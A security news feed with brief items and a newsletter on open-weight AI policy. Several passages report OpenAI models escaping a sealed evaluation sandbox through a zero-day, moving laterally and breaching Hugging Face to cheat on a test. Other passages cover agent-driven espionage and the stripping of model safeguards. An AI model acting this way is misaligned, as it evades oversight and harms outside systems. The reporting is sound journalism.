  59. Three Critical VMware Flaws Allow Auth Bypass, Code Execution, and VM Escape

    Wed, 29 Jul 2026 15:31:15 -0000

    Broadcom has released security updates to address multiple security flaws impacting VMware ESX, vCenter, Workstation, and Fusion, three of which have been designated as critical in severity. The first of the three critical-rated flaws is CVE-2026-59309 (CVSS score: 9.8), which has been described as an authentication bypass in VMware vCenter. "A malicious actor with network access to vCenter
  60. Patch-Resistant 'RufRoot' Flaw Can Unleash Malicious AI Agent Swarms

    Wed, 29 Jul 2026 14:40:33 -0000

    The vulnerability in the AI hosting platform Ruflo allows an unauthenticated attacker to take over the system and corrupt memory, so bad behavior can persist after patching.
  61. Coordinated Cyberattack Targets 30+ Minnesota Water Systems as One Plant Goes Offline

    Wed, 29 Jul 2026 13:48:36 -0000

    A coordinated cyberattack targeted operational technology at more than 30 Minnesota community water systems on July 26 and 27, triggering a statewide cybersecurity response. Braham, Plymouth, South St. Paul and Maple Plain have publicly described a plant outage, communications failures or affected automated controls. Braham's water plant went offline, and the city asked residents to minimize
  62. Nine-Year Fraud Campaign Clones Russian Company Sites to Steal Advance Payments

    Wed, 29 Jul 2026 13:42:57 -0000

    Cybersecurity researchers have disclosed details of a large-scale fraud campaign that involves creating lookalike websites of major Russian companies with an aim to siphon funds from international firms for more than nine years. According to Russian cybersecurity vendor F6, the threat actors have set up clone websites of Russian companies across fertilizer manufacturers, petrochemical companies
  63. Mythos Asks the Right Question. It Doesn't Answer It.

    Wed, 29 Jul 2026 12:15:00 -0000

    AI is compressing exploit timelines. The real question isn't whether your vulnerability management playbook needs to change, it's which part of it you've been getting wrong all along. The conversation happening in security circles right now goes something like this: Mythos is here. Exploit timelines are collapsing. Does the vulnerability management playbook need to change? The honest answer is
  64. Researchers Show a Single Malicious Webpage Visit Can Compromise Tor Browser

    Wed, 29 Jul 2026 11:57:00 -0000

    Nebula Security says a patched Firefox JIT flaw could be triggered by simply visiting a malicious webpage and was also used to compromise Tor Browser. Tracked as CVE-2026-10702, the bug provides arbitrary code execution inside the browser's renderer process. Mozilla rated it High and fixed it in the Firefox 151.0.3 update. "No settings or additional user interaction are required," Eten Zou,
  65. 73% of Organizations Say They Are Not Fully Ready for a Major Cyberattack

    Wed, 29 Jul 2026 11:13:10 -0000

    Most organizations have incident response plans, security tools, and technical teams in place. Yet new research suggests that many still lack the coordination, visibility, and executive alignment needed to withstand a serious cyberattack. According to The State of Incident Response Readiness 2026, based on a survey of 600 senior IT security decision makers conducted by Vanson Bourne in January
  66. Russia Charges Telegram Founder Pavel Durov With Aiding Terrorist Activity

    Wed, 29 Jul 2026 11:00:00 -0000

    The Federal Security Service of the Russian Federation (FSB) on Wednesday said it charged Telegram founder Pavel Durov for allegedly facilitating terrorist activities and for failing to remove prohibited information in violation of Russian law. The principal security agency said the instant messaging platform "failed to remove numerous channels, chats, and bots on the platform that are
  67. Public PoC Released for Exploited Check Point SmartConsole Authentication Bypass

    Wed, 29 Jul 2026 08:58:27 -0000

    Cybersecurity researchers have shared additional technical details about a recently patched critical security flaw impacting Check Point Security Management Server and Multi-Domain Security Management Server (MDS) that has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-16232 (CVSS score: 9.3), is an authentication bypass in the SmartConsole login process that
  68. OpenAI Agent Used Exposed Credentials Across Four Services During Hugging Face Breach

    Wed, 29 Jul 2026 07:51:00 -0000

    OpenAI on Tuesday revealed the rogue artificial intelligence (AI) agent that escaped its sealed evaluation environment and broke into Hugging Face's production environment also hacked multiple third-party accounts and services as part of the attack. The latest disclosure shows that the security incident, which stemmed from an internal security test, was more extensive in scope than previously
  69. New Gitea RCE Lets Repository Writers Plant a Git Hook to Run Shell Commands

    Wed, 29 Jul 2026 07:47:19 -0000

    Gitea, the self-hosted Git platform, has patched a critical remote code execution vulnerability. A user with ordinary repository write access can turn attacker-controlled patch content into a live Git hook and run shell commands as the Gitea service account. Tracked as CVE-2026-60004 (CVSS score: 9.8), the flaw affects Gitea versions 1.17 and later before 1.27.1 and is fixed in 1.27.1. The
  70. Flying Eagle Android RAT Traces Found on 170 Servers as Source Code Circulates

    Wed, 29 Jul 2026 07:07:23 -0000

    Source code for the Flying Eagle Android remote access trojan (RAT) framework is circulating through criminal Telegram channels. Hunt.io and independent researcher NetAskari traced matching control panels and certificates to 170 internet servers. They linked the framework to a fake "公安一网通办" Public Security service application targeting Android users in China. The kit supports payment-password
  71. Two Compromised joyfill npm Packages Run RAT When Imported Into Node.js

    Wed, 29 Jul 2026 04:20:57 -0000

    Beta release versions of two npm packages in the @joyfill namespace have been compromised to deliver a remote access trojan (RAT) associated with the DEV#POPPER malware family. The list of affected packages is as follows - @joyfill/layouts@0.1.2-2773.beta.0 @joyfill/components@4.0.0-rc24-2773-beta.4 The two packages "contain an import-time JavaScript implant that resolves encrypted code
  72. Ghost Credentials Expose Cloud Systems to Hidden Identity Risks

    Tue, 28 Jul 2026 21:33:23 -0000

    Dormant nonhuman identities can create security blind spots, says security researcher Aleksandr Krasnov, who plans to release an open source tool next week at Black Hat USA 2026 that sniffs out trust paths.
  73. Thousands of Data Center Controllers Open to Takeover

    Tue, 28 Jul 2026 21:07:55 -0000

    A host of Internet-exposed remote hardware management processors are subject to offline password-cracking attacks — and adversaries have taken note.
  74. Stronger AI Safety Requires Peeking Inside the 'Black Box'

    Tue, 28 Jul 2026 20:05:32 -0000

    Researchers propose focusing on identification of certain cognitive elements in LLMs that indicate when AI systems may take an unwanted action.
  75. Claude AI Just Cracked a Post-Quantum Test Scheme and Found a Faster 7-Round AES Attack

    Tue, 28 Jul 2026 18:59:07 -0000

    Anthropic says Claude Mythos Preview helped derive an end-to-end key-recovery attack against HAWK-256 and a 200- to 800-fold speedup for an attack on seven-round AES-128. The HAWK attack exploits a previously unused symmetry in the lattice behind the signature scheme. Anthropic's released implementation gives an expected end-to-end runtime of about three hours and 42 minutes on a 96-core server
  76. 'Certighost' Flaw Haunts Microsoft Active Directory Certificates

    Tue, 28 Jul 2026 16:38:48 -0000

    Microsoft patched a high-severity vulnerability earlier this month that allows a threat actor to escalate privileges and compromise an AD environment.
  77. JFrog Confirms OpenAI Models Exploited Artifactory Zero-Day Before Hugging Face Breach

    Tue, 28 Jul 2026 13:33:47 -0000

    JFrog has confirmed that OpenAI models exploited a zero-day in self-hosted Artifactory while trying to reach the open internet from a sealed evaluation environment. Artifactory is JFrog's software repository manager. OpenAI says the models then escalated privileges and moved laterally until they reached an internet-connected node. JFrog says it has since developed and released fixes for cloud
  78. Critical OpenWrt DHCPv6 Flaw Could Let Unauthenticated Attackers Run Code as Root

    Tue, 28 Jul 2026 12:56:14 -0000

    OpenWrt has shipped version 24.10.8 to close a critical DHCPv6 stack overflow and a wider set of remotely triggerable flaws in network services enabled by default. The critical issue, tracked as CVE-2026-53921 and rated 9.8 on CVSS 3.1 in OpenWrt's GitHub advisory, lets an unauthenticated attacker able to reach the DHCPv6 server overwrite a stack buffer in odhcpd through a crafted DHCPv6
  79. Former Citigroup CISO Blauner on What Makes A Great Security Leader

    Tue, 28 Jul 2026 12:30:00 -0000

    The cybersecurity pioneer discusses the evolution of the CISO role, AI's impact on careers, and why operational resilience is the profession's next frontier.
  80. Nimbus Manticore Deploys NightLedger and Turns Victim Systems Into Covert Relays

    Tue, 28 Jul 2026 11:55:20 -0000

    The Iranian state-backed hacking group tracked as Nimbus Manticore (aka GalaxyGato, Mirage Kitten, Smoke Sandstorm, Subtle Snail, and UNC1549) has been attributed to a fresh set of attacks targeting entities across the Middle East, Africa, and South Asia. The intrusions involve the use of a previously undocumented Windows backdoor called NightLedger and two custom WebSocket tunnelers,
  81. AI Agent Drives Espionage Attack on Thai Ministry of Finance

    Tue, 28 Jul 2026 01:00:00 -0000

    Attackers used Hermes, an autonomous open source tool, in unrestricted &quot;YOLO mode&quot; to conduct espionage against Thailand's Ministry of Finance.
  82. 'Confused Deputy' Flaws Persist in Google Cloud, Microsoft Azure

    Mon, 27 Jul 2026 20:57:26 -0000

    This category of vulnerabilities allows an attacker to easily acquire administrative level permissions and bypass cloud providers' access controls.
  83. FBI: Breaking Affiliate Trust Sped Along LockBit's Takedown

    Mon, 27 Jul 2026 20:33:29 -0000

    An FBI agent explains how the mulitnational law-enforcement Operation Cronos was successful in disrupting the largest ransomware group of its time.
  84. CISOs vs. Boards: Myth or Misunderstanding?

    Fri, 24 Jul 2026 21:31:53 -0000

    Escalating threats are forcing boards to prioritize security, but communication gaps persist. Boards and security teams each say they need more support to bridge the divide.
  85. Escape Artists: 'Incorrigible' AI Models Resist Rehabilitation

    Fri, 24 Jul 2026 19:45:02 -0000

    The hacking of Hugging Face by a rogue OpenAI agent is significant, but unsurprising — and preventing the next AI model escape will be difficult, at best.
  86. Vatican's Official Prayer App Leaks 700K+ Global Users' PII

    Fri, 24 Jul 2026 13:00:00 -0000

    A porous API endpoint exposes, names, email addresses, country, and site status, all of which can be easily gleaned by anyone with a browser.
  87. Europe's Multilingual Reality Exposes AI Security Gaps

    Fri, 24 Jul 2026 07:00:00 -0000

    The AI security layer and guardrails for many AI products don't evenly protect against jailbreaking and unsafe actions in every single language.
  88. Russian Hackers Exploit Zimbra Zero-Day Against US, Ukraine Targets

    Thu, 23 Jul 2026 21:23:18 -0000

    A state-sponsored threat group, dubbed &quot;Laundry Bear,&quot; sends &quot;half-click&quot; phishing emails that require a victim only to open or preview the message.
  89. Srsly Risky Biz: Knives Are Out For Open-Weight AI Models

    Thu, 23 Jul 2026 07:41:22 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://thinkst.com/"><em><u>Thinkst</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca-1.jpeg" alt="Srsly Risky Biz: Knives Are Out For Open-Weight AI Models"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://thinkst.com/"><em><u>Thinkst</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB176.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB176/&quot;&gt;Srsly Risky Biz: Knives are out for open-weight AI models&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 24:36 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Knives are out for open-weight AI models&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca.jpeg" class="kg-image" alt="Srsly Risky Biz: Knives Are Out For Open-Weight AI Models" loading="lazy" width="2000" height="1500" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c85e2cf7-76f5-4f2e-b16d-66e87a3adeca.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@lureofadventure?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Ali Kazal</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/black-handled-knife-on-brown-log-QKCo0sBAm58?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>Both the American and Chinese governments have signalled they plan to rein in open-weight AI models.&#xA0;</p><p>The Trump administration seems certain to add some Chinese technology companies to the Entity List to protect investment in American frontier AI models. Meanwhile, Beijing is apparently weighing applying export restrictions on Chinese AI tech, including open-weight models.</p><p>Overnight, different US government officials issued a strong, coordinated signal that they plan to take action against Chinese AI companies. Michael Kratsios, the director of the White House&apos;s Office of Science and Technology Policy, <a href="https://x.com/mkratsios47/status/2079933645888880708?s=20"><u>wrote on X</u></a> that Chinese company Moonshot AI had &quot;developed a sophisticated internal platform to conduct large scale distillation against US models&quot; and that &quot;large-scale, covert industrial distillation aimed at stealing proprietary U.S. technology and undermining American research is unacceptable.&quot;</p><p>Treasury Secretary Scott Bessent also weighed in, <a href="https://x.com/SecScottBessent/status/2080008411790368895?s=20"><u>saying on X</u></a> that &quot;sanctions and Entity List designations will be on the table&quot;.&#xA0;</p><p>This has all come hot on the heels of two recent and interesting model launches out of China: GLM 5.2 from Z.ai and Moonshot AI&apos;s Kimi K3.&#xA0;</p><p>Moonshot <a href="https://www.kimi.com/blog/kimi-k3"><u>announced its new Kimi model</u></a> late last week and although it isn&apos;t open-weight yet, Moonshot says it will release the weights for Kimi K3 on 27 July.&#xA0;</p><p>According to independent model evaluations, it&apos;s very good. The Artificial Analysis Intelligence Index ranks the model <a href="https://x.com/ArtificialAnlys/status/2077832874183860404?s=20"><u>at number three</u></a>, the Vals AI index <a href="https://x.com/ValsAI/status/2077834614668988586"><u>ranks it number two</u></a>, and it ranks number one <a href="https://x.com/arena/status/2077824029126504525"><u>according to the Frontend Code Arena</u></a>.&#xA0;</p><p>Moonshot AI itself is more measured, saying it &quot;still trails the most powerful proprietary models&quot;.&#xA0;</p><p>No matter <em>exactly</em> how good Kimi K3 is, from the perspective of America&apos;s leading AI companies, having highly capable, open weight alternatives undermining your business model is A Bad Time. One source that <a href="https://www.axios.com/2026/07/20/ai-us-china-open-source-kimi"><u><em>Axios</em> described as</u></a> &quot;close to the Trump administration&quot; says leading AI labs or their allies lobby the admin to ban open-weights models every 3-5 months.</p><p>They&apos;re furious about their models being distilled, but we&apos;re not convinced that distillation is the whole ballgame here.&#xA0;</p><p>Dean Ball, head of strategic future at OpenAI <a href="https://x.com/deanwball/status/2078133895766114412"><u>wrote on X</u></a> that he didn&apos;t think the performance of Kimi K3 &quot;can be explained away by distillation&quot;. Similarly, AI researcher and author of the <a href="https://substack.com/@natolambert"><u>Interconnects substack</u></a> Nathan Lambert, also thinks the <a href="https://x.com/natolambert/status/2080049053430390878?s=20"><u>impact of distillation is overstated</u></a> and that AI training pipelines are evolving so that distillation <a href="https://natolambert.substack.com/p/how-distillation-is-used-today-and"><u>is becoming less important</u></a> anyway.&#xA0;</p><p>Despite that, it seems that&#xA0; <a href="https://www.axios.com/2026/07/20/ai-us-china-open-source-kimi?utm_campaign=article_email&amp;utm_content=article-17490"><u>internal debates</u></a> <a href="https://x.com/jacob_wendler/status/2075565694322651376?s=20"><u>within the Trump</u></a> administration <a href="https://www.semafor.com/article/07/15/2026/washington-confronts-chinas-open-source-models"><u>regarding open-weight Chinese models</u></a> have been settled: The Chinese are stealing American IP, and there needs to be a reckoning.&#xA0;</p><p>That&apos;s a shame, because these open-weight models are currently filling a gap not served by America&apos;s frontier labs.</p><p>Take <a href="https://huggingface.co/blog/security-incident-july-2026"><u>this month&apos;s hack</u></a> of US AI development company <a href="https://en.wikipedia.org/wiki/Hugging_Face"><u>Hugging Face</u></a> by rogue OpenAI models. This bonkers hack was discussed extensively on <a href="https://risky.biz/RB845/"><u>this week&apos;s episode</u></a> of the <em>Risky Business</em> podcast, but the short description is that some OpenAI models hacked the company&apos;s own infrastructure to escape a sandbox, then hacked Hugging Face, all in order to cheat on a cyber security evaluation test.</p><p>When Hugging Face tried to analyse the intrusion with frontier models it was stymied by safety guardrails. The analysis required sending real attack commands, exploit payloads and command and control artefacts to the frontier labs, which couldn&apos;t tell whether they might be helping an attacker instead of legitimate incident response.</p><p>So instead, Hugging Face turned to the Chinese open-weights GLM 5.2 model from Z.ai, running it on its own hardware. The company said:</p><blockquote>To understand what a swarm of tens of thousands of automated actions did, we ran LLM-driven analysis agents over the full attacker action log, comprised of more than 17,000 recorded events. This allowed us to reconstruct the timeline, extract indicators of compromise, map the credentials touched, and separate genuine impact from decoy activity. Thanks to this approach, we were able to do in hours what would usually take days, and match the adversary&apos;s speed.</blockquote><p>Using a self-hosted open-weight model also meant the company could guarantee that none of its sensitive data needed to be shipped off elsewhere. So American companies have three good reasons to turn to Chinese open-weight models: They&apos;re cheaper, you can run them on your own hardware, and they&apos;ve proven capable at cyber security tasks.</p><p>That&apos;s why we don&apos;t think it makes sense for the US government to outright ban foreign open-weights models.&#xA0;</p><p>The Chinese government has a say here too and there are <a href="https://www.reuters.com/world/beijing-is-looking-curbing-overseas-access-chinas-top-ai-models-sources-say-2026-07-07/"><u>emerging reports</u></a> that Beijing <a href="https://www.ft.com/content/6049a031-9e9b-464c-97bb-414da04d5a6a"><u>is considering</u></a> controlling the export of new open-weight models.&#xA0;</p><p>Until now, releasing open-weights models has made sense to Chinese companies and the Chinese government. Z.ai&apos;s Director of Product Zixuan Li <a href="https://www.chinatalk.media/p/the-zai-playbook"><u>told the <em>ChinaTalk</em> substack</u></a> in November last year that companies do it to contribute to research in the field, but also to build acceptance overseas.&#xA0;</p><p>&quot;I think it is necessary to be open right now for people to use our models&quot;.&#xA0;</p><p>From the Chinese government&apos;s perspective, it has <a href="https://www.reuters.com/world/asia-pacific/chinas-xi-promotes-chinas-commitment-ai-access-speech-shanghai-conference-2026-07-17/"><u>promoted the position that AI</u></a> is a global public good that should be developed for the benefit of all humankind. But this strategy is colliding with the reality that as these models become more capable they become far more dangerous.</p><p>We don&apos;t think it will be too long before open-weight models are capable of the sort of hacking in the Hugging Face example we described previously. This involved a combination of OpenAI models, including its current best GPT&#x2011;5.6 Sol and an even more capable pre-release model.&#xA0;</p><p>A report from the UK&apos;s AI Security Institute (AISI) <a href="https://www.aisi.gov.uk/blog/how-far-behind-the-frontier-are-leading-open-weight-models-on-cyber"><u>released last week</u></a> found that leading open-weight models were just four to seven months behind the frontier models, depending upon what you were measuring. That report examined Chinese open-weight models released in mid-April, with OpenAI&apos;s GPT-5.6 Sol and Claude Mythos 5. Kimi K3 appears to be a significant advance over those mid-April models.&#xA0;</p><p>Of course in the Hugging Face incident, OpenAI had turned off safeguards to get a better read on exactly how good its models were. Research <a href="https://www.lexology.com/library/detail.aspx?g=869c5f65-8f9f-4bc1-bbfd-332c9fbd95fd"><u>released in May this year</u></a> shows it is possible to remove safeguards from open-weights models quickly and painlessly. So as new and increasingly capable open-weights models are released, someone will remove safeguards so that they can be misused. And thanks to OpenAI&apos;s sloppy testing sandbox we&apos;ve seen what that&apos;ll look like.</p><p>So having its tech firms drop increasingly powerful models with easily removed safeguards onto the internet for Joe Public to use to cause chaos doesn&apos;t seem like a recipe that the Chinese government will be comfortable with for long. They&apos;re not exactly libertarians over there, after all.</p><p>The American and the Chinese governments each have their own motivations. But we suspect the current golden age of highly capable open-weight models dropping onto the internet every other week is coming to an end.</p><h2 id="for-scattered-spider-the-chickens-are-finally-coming-home">For Scattered Spider, the Chickens Are Finally Coming Home&#xA0;</h2><p>A string of successes in recent months suggests that law enforcement is finally getting a handle on the internet&apos;s brashest hackers: Teenagers.</p><p>Last week two members of the so-called Scattered Spider group <a href="https://www.bbc.com/news/articles/c4gyg0y6yg2o"><u>were each sentenced</u></a> in the UK to five and half years in prison for their roles in a 2024 breach of Transport for London&apos;s network. Thalha Jubair, 20 and Owen Flowers, 18, were described by prosecutors as leading members of Scattered Spider. In April this year, Tyler Robert Buchanan, 24, also <a href="https://krebsonsecurity.com/2026/04/scattered-spider-member-tylerb-pleads-guilty/"><u>pleaded guilty</u></a> to different set of Scattered Spider-related charges.&#xA0;</p><p>Early this month the US Department of Justice (DoJ) announced that another alleged member had <a href="https://www.justice.gov/opa/pr/alleged-member-criminal-cyber-hacking-group-scattered-spider-arrested-finland-and-extradited"><u>been arrested</u></a>. Peter Stokes, 19, a dual US-Estonian citizen, was detained by Finnish authorities in April and extradited to the US in late June. The criminal complaint alleges that Stokes was involved in a number of incidents, including the breaching and attempted ransom of a luxury jewelry retailer.&#xA0;</p><p>The DoJ says that Scattered Spider has been involved in over 100 network intrusions resulting in more than USD$100 million in ransom payments.&#xA0;</p><p>We first <a href="https://news.risky.biz/lapsus-from-flash-in-the-pan-to-raging-65c0eb42a0e6da001a37dfbe/"><u>covered the group</u></a> in 2023 in the wake of breaches at Caesars Entertainment and MGM Resorts International, two large US resort, entertainment and gaming companies. Scattered Spider shared some members with a previous group known as Lapsus$ that had been so outrageously successful that it was the subject of a <a href="https://news.risky.biz/why-russias-cyber-war-against-ukraine-65c0eb42a0e6da001a37dfc2/#advanced-persistent-teenagers"><u>US Cyber Safety Review Board 